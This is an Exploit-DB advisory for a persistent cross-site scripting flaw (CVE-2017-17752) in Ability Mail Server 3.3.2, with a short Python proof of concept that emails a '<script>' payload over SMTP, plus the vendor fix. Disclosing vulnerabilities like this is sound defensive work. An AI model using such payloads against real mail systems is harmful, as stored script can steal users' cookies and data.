Ability Mail Server 3.3.2 - Cross-Site Scripting

EDB-ID:

43378

CVE:

2017-17752

EDB Verified:

Author:

Aloyce J. Makalanga

Type:

webapps

Exploit:   /  

Platform:

Multiple

Date:

2017-12-20

Vulnerable App: 
# Exploit Title: Ability Mail Server 3.3.2 Persistent Cross Site Scripting (XSS)
# CVE: CVE-2017-17752
# Date: 19-12-2017
# Software Link: http://download.codecrafters.com/ams3.exe 
# Exploit Author: Aloyce J. Makalanga
# Contact: https://twitter.com/aloycemjr
# Vendor Homepage: http://www.codecrafters.com 
# Category: webapps
# Attack Type: Remote
# Impact: Data/Cookie theft 

 
1. Description


   Ability Mail Server 3.3.2 has Persistent Cross Site Scripting (XSS) via the body of an e-mail message, with JavaScript code executed on the Read Mail screen (aka the /_readmail URI). To exploit the vulnerability, the victim must open an email with malicious Javascript inserted into the body of the email.


   
2. Proof of Concept

 

#!/usr/bin/env python 
email_addr = 'hacker@evil.local'
email = 'From: %s\n' % email_addr
email += 'To: %s\n' % email_addr
email += 'Subject: XSS\n'
email += 'Content-type: text/html\n\n'
email +='<script>alert(1)</script>'
s = smtplib.SMTP('<Attacker IP address', 25)
s.login(email_addr, "password")
s.sendmail(email_addr, email_addr, email)
s.quit()

3. Solution:

   
Update to version 4.2.4
http://download.codecrafters.com/ams.exe
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services